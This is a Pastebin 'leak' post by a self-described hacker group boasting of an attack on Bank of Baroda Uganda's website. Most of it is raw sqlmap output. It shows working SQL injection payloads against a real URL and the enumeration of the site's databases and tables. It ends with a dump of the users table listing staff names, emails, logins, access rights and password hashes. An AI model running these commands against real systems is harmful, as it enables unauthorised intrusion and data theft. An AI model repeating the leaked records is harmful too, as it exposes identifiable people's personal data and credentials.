Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ########################################################
- ____ _____ __ __
- / | / ___/ | | |
- | __| ( \_ | | |
- | | | \__ | | _ |
- | |_ | / \ | | | |
- | | \ | | | |
- |___,_| aruda \___| ecurity |__|__| acker
- LEAKING SOMETHING FUCKING COOL
- *****
- Date Thursday 27 July 2017
- Target BANK OF BARODA UGANDA
- by Yukinoshita 47
- ############################################################
- Yukinoshita 47 - Cr4bbyP4tty - _Tuan2Fay_
- E7B_404 - Lyonc - Fazlast - Mr. Viruzer#29
- Engkus - Snooze - Sys47ID -
- And All Member of Garuda Security Hacker
- blog : http://blog.garudasecurityhacker.org
- FB : https://facebook.com/gshofficialpageindonesia
- ############################################################
- root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 06:33:01
- [06:33:01] [INFO] resuming back-end DBMS 'mysql'
- [06:33:02] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: detail
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: detail=-8074 OR (1732=1732)#
- Type: error-based
- Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
- Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
- ---
- [06:33:05] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.3.29
- back-end DBMS: MySQL 5.1
- [06:33:05] [INFO] fetching database names
- [06:33:08] [INFO] the SQL query used returns 3 entries
- [06:33:10] [INFO] retrieved: "information_schema"
- [06:33:13] [INFO] retrieved: "tampco_bobDb"
- [06:33:15] [INFO] retrieved: "tampco_webnet"
- available databases [3]:
- [*] information_schema
- [*] tampco_bobDb
- [*] tampco_webnet
- [06:33:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
- [*] shutting down at 06:33:15
- root@yukinoshita47:~# ^C
- root@yukinoshita47:~# clear
- root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 06:34:14
- [06:34:15] [INFO] resuming back-end DBMS 'mysql'
- [06:34:15] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: detail
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: detail=-8074 OR (1732=1732)#
- Type: error-based
- Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
- Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
- ---
- [06:34:18] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.3.29
- back-end DBMS: MySQL 5.1
- [06:34:18] [INFO] fetching database names
- [06:34:18] [INFO] the SQL query used returns 3 entries
- [06:34:18] [INFO] resumed: "information_schema"
- [06:34:18] [INFO] resumed: "tampco_bobDb"
- [06:34:18] [INFO] resumed: "tampco_webnet"
- available databases [3]:
- [*] information_schema
- [*] tampco_bobDb
- [*] tampco_webnet
- [06:34:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
- [*] shutting down at 06:34:18
- root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet --tables
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 06:35:16
- [06:35:16] [INFO] resuming back-end DBMS 'mysql'
- [06:35:16] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: detail
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: detail=-8074 OR (1732=1732)#
- Type: error-based
- Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
- Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
- ---
- [06:35:20] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.3.29
- back-end DBMS: MySQL 5.1
- [06:35:20] [INFO] fetching tables for database: 'tampco_webnet'
- [06:35:23] [INFO] the SQL query used returns 11 entries
- [06:35:25] [INFO] retrieved: "annual_report"
- [06:35:27] [INFO] retrieved: "app_category"
- [06:35:29] [INFO] retrieved: "application_form"
- [06:35:31] [INFO] retrieved: "currency_category"
- [06:35:33] [INFO] retrieved: "exchange_rate"
- [06:35:35] [INFO] retrieved: "new_event"
- [06:35:36] [INFO] retrieved: "photo_category"
- [06:35:38] [INFO] retrieved: "photo_gallary"
- [06:35:41] [INFO] retrieved: "rpt_category"
- [06:35:43] [INFO] retrieved: "share_price"
- [06:35:45] [INFO] retrieved: "users"
- Database: tampco_webnet
- [11 tables]
- +-------------------+
- | annual_report |
- | app_category |
- | application_form |
- | currency_category |
- | exchange_rate |
- | new_event |
- | photo_category |
- | photo_gallary |
- | rpt_category |
- | share_price |
- | users |
- +-------------------+
- [06:35:45] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
- [*] shutting down at 06:35:45
- root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet --columns
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 06:37:32
- [06:37:32] [INFO] resuming back-end DBMS 'mysql'
- [06:37:32] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: detail
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: detail=-8074 OR (1732=1732)#
- Type: error-based
- Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
- Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
- ---
- [06:38:05] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.3.29
- back-end DBMS: MySQL 5.1
- [06:38:05] [INFO] fetching tables for database: 'tampco_webnet'
- [06:38:06] [INFO] the SQL query used returns 11 entries
- [06:38:06] [INFO] resumed: "annual_report"
- [06:38:06] [INFO] resumed: "app_category"
- [06:38:06] [INFO] resumed: "application_form"
- [06:38:06] [INFO] resumed: "currency_category"
- [06:38:06] [INFO] resumed: "exchange_rate"
- [06:38:06] [INFO] resumed: "new_event"
- [06:38:06] [INFO] resumed: "photo_category"
- [06:38:06] [INFO] resumed: "photo_gallary"
- [06:38:06] [INFO] resumed: "rpt_category"
- [06:38:06] [INFO] resumed: "share_price"
- [06:38:06] [INFO] resumed: "users"
- [06:38:06] [INFO] fetching columns for table 'app_category' in database 'tampco_webnet'
- [06:38:08] [INFO] the SQL query used returns 2 entries
- [06:38:10] [INFO] retrieved: "app_cat_id","int(3)"
- [06:38:12] [INFO] retrieved: "app_category","varchar(30)"
- [06:38:13] [INFO] fetching columns for table 'photo_category' in database 'tampco_webnet'
- [06:38:15] [INFO] the SQL query used returns 2 entries
- [06:38:17] [INFO] retrieved: "cat_id","int(3)"
- [06:38:18] [INFO] retrieved: "pic_category","varchar(30)"
- [06:38:18] [INFO] fetching columns for table 'rpt_category' in database 'tampco_webnet'
- [06:38:20] [INFO] the SQL query used returns 2 entries
- [06:38:23] [INFO] retrieved: "rept_cat_id","int(3)"
- [06:38:25] [INFO] retrieved: "rpt_category","varchar(30)"
- [06:38:25] [INFO] fetching columns for table 'photo_gallary' in database 'tampco_webnet'
- [06:38:58] [INFO] the SQL query used returns 5 entries
- [06:39:00] [INFO] retrieved: "pic_id","int(3)"
- [06:39:02] [INFO] retrieved: "cat_id","int(3)"
- [06:39:05] [INFO] retrieved: "picture","varchar(200)"
- [06:39:07] [INFO] retrieved: "d_desc","text"
- [06:39:09] [INFO] retrieved: "date_taken","date"
- [06:39:09] [INFO] fetching columns for table 'annual_report' in database 'tampco_webnet'
- [06:39:11] [INFO] the SQL query used returns 5 entries
- [06:39:14] [INFO] retrieved: "rept_id","int(3)"
- [06:39:15] [INFO] retrieved: "rept_cat_id","int(3)"
- [06:39:17] [INFO] retrieved: "title","varchar(100)"
- [06:39:19] [INFO] retrieved: "report","varchar(200)"
- [06:39:21] [INFO] retrieved: "rept_date","date"
- [06:39:21] [INFO] fetching columns for table 'currency_category' in database 'tampco_webnet'
- [06:39:24] [INFO] the SQL query used returns 2 entries
- [06:39:26] [INFO] retrieved: "currency_code","int(3)"
- [06:39:28] [INFO] retrieved: "currency_name","varchar(50)"
- [06:39:28] [INFO] fetching columns for table 'exchange_rate' in database 'tampco_webnet'
- [06:40:01] [INFO] the SQL query used returns 7 entries
- [06:40:03] [INFO] retrieved: "ex_rate_id","int(3)"
- [06:40:05] [INFO] retrieved: "currency_code","int(3)"
- [06:40:07] [INFO] retrieved: "ex_rate","float"
- [06:40:09] [INFO] retrieved: "selling_rate","float"
- [06:40:11] [INFO] retrieved: "ex_date","text"
- [06:40:13] [INFO] retrieved: "ex_time","text"
- [06:40:15] [INFO] retrieved: "date_time","timestamp"
- [06:40:15] [INFO] fetching columns for table 'new_event' in database 'tampco_webnet'
- [06:40:48] [INFO] the SQL query used returns 6 entries
- [06:40:50] [INFO] retrieved: "n_id","int(4)"
- [06:40:53] [INFO] retrieved: "avenue","varchar(100)"
- [06:40:55] [INFO] retrieved: "e_desc","text"
- [06:40:57] [INFO] retrieved: "e-link","text"
- [06:40:58] [INFO] retrieved: "event_date","text"
- [06:41:00] [INFO] retrieved: "archive","tinyint(1)"
- [06:41:00] [INFO] fetching columns for table 'share_price' in database 'tampco_webnet'
- [06:41:02] [INFO] the SQL query used returns 3 entries
- [06:41:05] [INFO] retrieved: "share_date","date"
- [06:41:07] [INFO] retrieved: "amount","float"
- [06:41:10] [INFO] retrieved: "share_time","timestamp"
- [06:41:10] [INFO] fetching columns for table 'application_form' in database 'tampco_webnet'
- [06:41:12] [INFO] the SQL query used returns 5 entries
- [06:41:45] [INFO] retrieved: "app_id","int(3)"
- [06:41:47] [INFO] retrieved: "app_cat_id","int(3)"
- [06:41:49] [INFO] retrieved: "title","varchar(100)"
- [06:41:51] [INFO] retrieved: "app_form","varchar(200)"
- [06:41:53] [INFO] retrieved: "form_date","date"
- [06:41:53] [INFO] fetching columns for table 'users' in database 'tampco_webnet'
- [06:41:55] [INFO] the SQL query used returns 10 entries
- [06:42:04] [INFO] retrieved: "userid","int(11)"
- [06:42:06] [INFO] retrieved: "loginname","varchar(255)"
- [06:42:08] [INFO] retrieved: "password","varchar(255)"
- [06:42:10] [INFO] retrieved: "temp_pass","varchar(55)"
- [06:42:12] [INFO] retrieved: "temp_pass_active","tinyint(1)"
- [06:42:14] [INFO] retrieved: "email","varchar(255)"
- [06:42:16] [INFO] retrieved: "fname","text"
- [06:42:18] [INFO] retrieved: "sname","text"
- [06:42:20] [INFO] retrieved: "page_access","text"
- [06:42:22] [INFO] retrieved: "Guid","varchar(32)"
- Database: tampco_webnet
- Table: app_category
- [2 columns]
- +--------------+-------------+
- | Column | Type |
- +--------------+-------------+
- | app_cat_id | int(3) |
- | app_category | varchar(30) |
- +--------------+-------------+
- Database: tampco_webnet
- Table: photo_category
- [2 columns]
- +--------------+-------------+
- | Column | Type |
- +--------------+-------------+
- | cat_id | int(3) |
- | pic_category | varchar(30) |
- +--------------+-------------+
- Database: tampco_webnet
- Table: rpt_category
- [2 columns]
- +--------------+-------------+
- | Column | Type |
- +--------------+-------------+
- | rept_cat_id | int(3) |
- | rpt_category | varchar(30) |
- +--------------+-------------+
- Database: tampco_webnet
- Table: photo_gallary
- [5 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | cat_id | int(3) |
- | d_desc | text |
- | date_taken | date |
- | pic_id | int(3) |
- | picture | varchar(200) |
- +------------+--------------+
- Database: tampco_webnet
- Table: annual_report
- [5 columns]
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | report | varchar(200) |
- | rept_cat_id | int(3) |
- | rept_date | date |
- | rept_id | int(3) |
- | title | varchar(100) |
- +-------------+--------------+
- Database: tampco_webnet
- Table: currency_category
- [2 columns]
- +---------------+-------------+
- | Column | Type |
- +---------------+-------------+
- | currency_code | int(3) |
- | currency_name | varchar(50) |
- +---------------+-------------+
- Database: tampco_webnet
- Table: exchange_rate
- [7 columns]
- +---------------+-----------+
- | Column | Type |
- +---------------+-----------+
- | currency_code | int(3) |
- | date_time | timestamp |
- | ex_date | text |
- | ex_rate | float |
- | ex_rate_id | int(3) |
- | ex_time | text |
- | selling_rate | float |
- +---------------+-----------+
- Database: tampco_webnet
- Table: new_event
- [6 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | e-link | text |
- | archive | tinyint(1) |
- | avenue | varchar(100) |
- | e_desc | text |
- | event_date | text |
- | n_id | int(4) |
- +------------+--------------+
- Database: tampco_webnet
- Table: share_price
- [3 columns]
- +------------+-----------+
- | Column | Type |
- +------------+-----------+
- | amount | float |
- | share_date | date |
- | share_time | timestamp |
- +------------+-----------+
- Database: tampco_webnet
- Table: application_form
- [5 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | app_cat_id | int(3) |
- | app_form | varchar(200) |
- | app_id | int(3) |
- | form_date | date |
- | title | varchar(100) |
- +------------+--------------+
- Database: tampco_webnet
- Table: users
- [10 columns]
- +------------------+--------------+
- | Column | Type |
- +------------------+--------------+
- | email | varchar(255) |
- | fname | text |
- | Guid | varchar(32) |
- | loginname | varchar(255) |
- | page_access | text |
- | password | varchar(255) |
- | sname | text |
- | temp_pass | varchar(55) |
- | temp_pass_active | tinyint(1) |
- | userid | int(11) |
- +------------------+--------------+
- [06:42:22] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
- [*] shutting down at 06:42:22
- root@yukinoshita47:~# sqlmap -u https://www.bankofbaroda.ug/newsdetails.php?detail=109 -D tampco_webnet -T users -C email,fname,loginname,page_access,password,userid --dump
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 06:45:15
- [06:45:16] [INFO] resuming back-end DBMS 'mysql'
- [06:45:16] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: detail
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: detail=-8074 OR (1732=1732)#
- Type: error-based
- Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
- Payload: detail=109 AND EXTRACTVALUE(3077,CONCAT(0x5c,0x7162766f71,(SELECT (CASE WHEN (3077=3077) THEN 1 ELSE 0 END)),0x716b6d6171))
- Type: UNION query
- Title: MySQL UNION query (NULL) - 6 columns
- Payload: detail=109 UNION ALL SELECT NULL,NULL,CONCAT(0x7162766f71,0x70514f6f51766f485351,0x716b6d6171),NULL,NULL,NULL#
- ---
- [06:45:19] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.3.29
- back-end DBMS: MySQL 5.1
- [06:45:19] [INFO] fetching columns 'email, fname, loginname, page_access, password, userid' for table 'users' in database 'tampco_webnet'
- [06:45:22] [INFO] the SQL query used returns 6 entries
- [06:45:24] [INFO] retrieved: "userid","int(11)"
- [06:45:26] [INFO] retrieved: "loginname","varchar(255)"
- [06:45:28] [INFO] retrieved: "password","varchar(255)"
- [06:45:30] [INFO] retrieved: "email","varchar(255)"
- [06:45:32] [INFO] retrieved: "fname","text"
- [06:45:35] [INFO] retrieved: "page_access","text"
- [06:45:35] [INFO] fetching entries of column(s) 'email, fname, loginname, page_access, password, userid' for table 'users' in database 'tampco_webnet'
- [06:45:37] [INFO] the SQL query used returns 7 entries
- [06:45:39] [INFO] retrieved: "info@bankofbaroda.ug","Administrator","admin","forex admin,forex,shares,news,ph...
- [06:45:41] [INFO] retrieved: "kaitesi.maureen@yahoo.com","Maureen","mkaitesi","forex admin,forex,shares,news,...
- [06:45:44] [INFO] retrieved: "it.uganda@bankofbaroda.com","admin3","admin3","forex admin,forex,shares,news,ph...
- [06:45:45] [INFO] retrieved: "mahesharora@india.com","Mahesh","arora","forex admin,forex,shares,news,photos,u...
- [06:45:48] [INFO] retrieved: "treasury.uganda@bankofbaroda.com","Prithwijit","pg075512","forex admin,forex","...
- [06:45:50] [INFO] retrieved: "bcm.uganda@bankofbaroda.co.in","Anand","ak072078","shares,photos","1f96b0dcb9a8...
- [06:45:52] [INFO] retrieved: "deepcreep09.avinash@gmail.com","AVINASH","as075402","shares,news,photos","b281b...
- [06:45:52] [INFO] analyzing table dump for possible password hashes
- Database: tampco_webnet
- Table: users
- [7 entries]
- +--------+---------------+----------------------------------+------------------------------------+-----------+--------------------------------------------+
- | userid | fname | email | password | loginname | page_access |
- +--------+---------------+----------------------------------+------------------------------------+-----------+--------------------------------------------+
- | 9 | Administrator | info@bankofbaroda.ug | 1d85133082902eff839f2e8cb9fd29511 | admin | forex admin,forex,shares,news,photos,users |
- | 24 | Maureen | kaitesi.maureen@yahoo.com | dfc639cce1e77c49a91480c1e6d0d3c01 | mkaitesi | forex admin,forex,shares,news,photos,users |
- | 35 | admin3 | it.uganda@bankofbaroda.com | 8eb0a372b1a9865b326c05b33a18b8981 | admin3 | forex admin,forex,shares,news,photos,users |
- | 36 | Mahesh | mahesharora@india.com | fdfdfeaa6e6764b5dc9dfd2895f6652311 | arora | forex admin,forex,shares,news,photos,users |
- | 28 | Prithwijit | treasury.uganda@bankofbaroda.com | b56e0b4ea4962283bee762525c2d490f1 | pg075512 | forex admin,forex |
- | 38 | Anand | bcm.uganda@bankofbaroda.co.in | 1f96b0dcb9a80d10a36be4d92a31830f1 | ak072078 | shares,photos |
- | 37 | AVINASH | deepcreep09.avinash@gmail.com | b281b23c80f21188bc302987b9a558841 | as075402 | shares,news,photos |
- +--------+---------------+----------------------------------+------------------------------------+-----------+--------------------------------------------+
- [06:45:52] [INFO] table 'tampco_webnet.users' dumped to CSV file '/usr/share/sqlmap/output/www.bankofbaroda.ug/dump/tampco_webnet/users.csv'
- [06:45:52] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.bankofbaroda.ug'
- [*] shutting down at 06:45:52
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement